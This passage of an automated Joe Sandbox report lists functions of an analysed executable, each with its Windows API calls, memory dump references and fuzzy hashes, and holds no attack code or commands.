                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,004151C7,?,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420CA6
                                                                                                                                              • CompareStringW.KERNEL32(?,?,00000064,00000000,?,00000000,?,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000), ref: 00420CBC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1997773198-0
                                                                                                                                              • Opcode ID: b5c51588650a37d4d1cb3d5db00bbc7826fd7714118cecf2b9c72995b1b9842b
                                                                                                                                              • Instruction ID: 03b7f2b66f2d75cf62d1d1e7f9f5aea8b6d3942825eff640f69c1656141198f9
                                                                                                                                              • Opcode Fuzzy Hash: b5c51588650a37d4d1cb3d5db00bbc7826fd7714118cecf2b9c72995b1b9842b
                                                                                                                                              • Instruction Fuzzy Hash: C431BC72900218EBCF25DF91DD45BDEBBB5FF08714FA0021AF814A62A1C7399992DB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00426AEC Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00426B1D
                                                                                                                                              • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00426B60
                                                                                                                                              • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00426B95
                                                                                                                                              • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 00426BB9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: d1cd1edd8aebf657208b84a0c5c289419f7b47b2a8eecfcaa9bf4f1bc9fb4320
                                                                                                                                              • Instruction ID: 3f5e675f55d4a702bf8c1dec3373815d05f2456b451231204fc43b2a1b7b8f7a
                                                                                                                                              • Opcode Fuzzy Hash: d1cd1edd8aebf657208b84a0c5c289419f7b47b2a8eecfcaa9bf4f1bc9fb4320
                                                                                                                                              • Instruction Fuzzy Hash: D0215331740239EBCA219E06ECC0F277F6DEB45744F97446BF941A7351CA26BC40D6A9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A0ED Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00443500,00000000,00000001,?), ref: 0042A130
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0042A150
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042A194
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0042A1AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$OpenQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1607946009-0
                                                                                                                                              • Opcode ID: e01145a01794671db8f5410ae6055daedd9c25c5f260b156cd7b5aa0a6d2c763
                                                                                                                                              • Instruction ID: dc5cdb4f54a3a496b110042336def724de51f15833206d37b3068f0c10fa97b6
                                                                                                                                              • Opcode Fuzzy Hash: e01145a01794671db8f5410ae6055daedd9c25c5f260b156cd7b5aa0a6d2c763
                                                                                                                                              • Instruction Fuzzy Hash: 07215C71E00214EFDB21CF95EC44ABEFBB8EF50314F9040AAE905A6211D3745A25DF6A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042A57A Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0042A5A3
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0042A60B
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 0042A62D
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0042A638
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteEnumOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4142876296-0
                                                                                                                                              • Opcode ID: 030e9521213b5cec4a943126c4209cfb504d0090493e7cce31642c1ea77828a9
                                                                                                                                              • Instruction ID: 74490a7ce1c544a02dbf4f80efdb720ef59ca58dfc40bea8b14ed366bb9d3a97
                                                                                                                                              • Opcode Fuzzy Hash: 030e9521213b5cec4a943126c4209cfb504d0090493e7cce31642c1ea77828a9
                                                                                                                                              • Instruction Fuzzy Hash: CA216B72E0012AAFCB21DB94D851BEEB7B4EF08314F444176FD11A72A0CB389E568B95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004120BA Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3253174383-0
                                                                                                                                              • Opcode ID: 5c80eacd3d21a3520f2eedc2b141da2997b8ba1f6184b55e1f1dc4efe2ab2cb9
                                                                                                                                              • Instruction ID: 92880c54d83cef890ef01a83bb49db2f2e97ba72a390528555b3e8eed935738a
                                                                                                                                              • Opcode Fuzzy Hash: 5c80eacd3d21a3520f2eedc2b141da2997b8ba1f6184b55e1f1dc4efe2ab2cb9
                                                                                                                                              • Instruction Fuzzy Hash: 9E118130300206BBCB24DF24DE88BE677A4BF01350F54442BFE85D6260D7B9D9A1CA18
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00422D1A Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00422D40
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00422D48
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00422D5A
                                                                                                                                              • FreeResource.KERNEL32(00000000), ref: 00422DA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindFreeLoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1078018258-0
                                                                                                                                              • Opcode ID: 0603fb92bcd478c8b805d9f6208dcb30c6965e4ad22ab062ac3084de4d362369
                                                                                                                                              • Instruction ID: 37e77f0d580c985eccbe4e444c991a434d904d033160aeb73e9ee784c397293c
                                                                                                                                              • Opcode Fuzzy Hash: 0603fb92bcd478c8b805d9f6208dcb30c6965e4ad22ab062ac3084de4d362369
                                                                                                                                              • Instruction Fuzzy Hash: 4E118279611722FFC7309F54EA48AABB774FF04755F80406AE80253750D7B8AD45C7A8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042728D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004272C1
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 004272C7
                                                                                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 004272CA
                                                                                                                                              • GetLastError.KERNEL32(?), ref: 004272E5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3907606552-0
                                                                                                                                              • Opcode ID: 61c7e7d9b6b474a063e6b9c6d7eaf6789762496f64cb53e64a4fe5b19839d303
                                                                                                                                              • Instruction ID: 46fbf665e5fe45f0ecf4fbdd7c511345cd6b3779fbaa23856ba3fec1c6fd91d8
                                                                                                                                              • Opcode Fuzzy Hash: 61c7e7d9b6b474a063e6b9c6d7eaf6789762496f64cb53e64a4fe5b19839d303
                                                                                                                                              • Instruction Fuzzy Hash: 4101B131704210ABDB209BA5ED4AF1A7BA9EF84320F904566FA05CB281DA75DC01C774
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00425AE3 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00425B0D
                                                                                                                                              • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00425B2F
                                                                                                                                              • GetCapture.USER32 ref: 00425B41
                                                                                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00425B50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Capture
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1665607226-0
                                                                                                                                              • Opcode ID: 41ba8c012cf105ab7cfabcbff710673018262f8e0ce4aae3eb8d127922dae7ed
                                                                                                                                              • Instruction ID: 30d2a2513be581f839b2656ca0720de834e8737dd73f72248518bd740216b687
                                                                                                                                              • Opcode Fuzzy Hash: 41ba8c012cf105ab7cfabcbff710673018262f8e0ce4aae3eb8d127922dae7ed
                                                                                                                                              • Instruction Fuzzy Hash: 2F016D703407187FFA302B15ACC9FBB76ADDB88788F914039F341EA1D2C6A59C055A64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429689 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 004296C0
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?), ref: 004296C9
                                                                                                                                              • wsprintfA.USER32 ref: 004296E5
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004296FB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1902064621-0
                                                                                                                                              • Opcode ID: 927a4f46756840b7d5d769d63706027d2597c3eeb89ddb1f9a2eacf531248ca7
                                                                                                                                              • Instruction ID: a5194eaa5d267bfce1f697c3276f513d5c4f67dce319ffc6cf3dff497de3ed65
                                                                                                                                              • Opcode Fuzzy Hash: 927a4f46756840b7d5d769d63706027d2597c3eeb89ddb1f9a2eacf531248ca7
                                                                                                                                              • Instruction Fuzzy Hash: D3018B32600219FBCB11DFA4ED05F9F7BB9BF48708F90403AFA11AA150DB75DA119B98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00424FBF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetTopWindow.USER32(?), ref: 00424FCD
                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 0042500C
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0042502A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2353593579-0
                                                                                                                                              • Opcode ID: 6642e3dc04a849abbdc9febbdb983b15e036c38badf80aee8fee512f8d387543
                                                                                                                                              • Instruction ID: e8fda6cfe15639f69245f96e4c32ccf3e247865d1e166a8c34f89f462bfd62a7
                                                                                                                                              • Opcode Fuzzy Hash: 6642e3dc04a849abbdc9febbdb983b15e036c38badf80aee8fee512f8d387543
                                                                                                                                              • Instruction Fuzzy Hash: 4501003220152ABBCF226F91ED09E9F3B25EF89350F854025FE1055161D73AC932EBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00424A31 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00424A3C
                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 00424A4F
                                                                                                                                                • Part of subcall function 00424A31: GetWindow.USER32(00000000,00000002), ref: 00424A96
                                                                                                                                              • GetTopWindow.USER32(?), ref: 00424A7F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 369458955-0
                                                                                                                                              • Opcode ID: b9f3f23133e0281108d4f9682040040fb4f1f4bc896dd1d0bc87f1e1c94142e9
                                                                                                                                              • Instruction ID: 24d9463ce005fff643b8f741c0515ee5154fda0862fcd9038226e8ac00ae5952
                                                                                                                                              • Opcode Fuzzy Hash: b9f3f23133e0281108d4f9682040040fb4f1f4bc896dd1d0bc87f1e1c94142e9
                                                                                                                                              • Instruction Fuzzy Hash: 37014432381536BB8F326B52AC04E9F3A69DFD53A4BD14036FE1055211E739C921969D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042B50D Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SysStringLen.OLEAUT32(?), ref: 0042B521
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042CE8B,00000000), ref: 0042B537
                                                                                                                                              • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042B53F
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042CE8B,00000000), ref: 0042B554
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
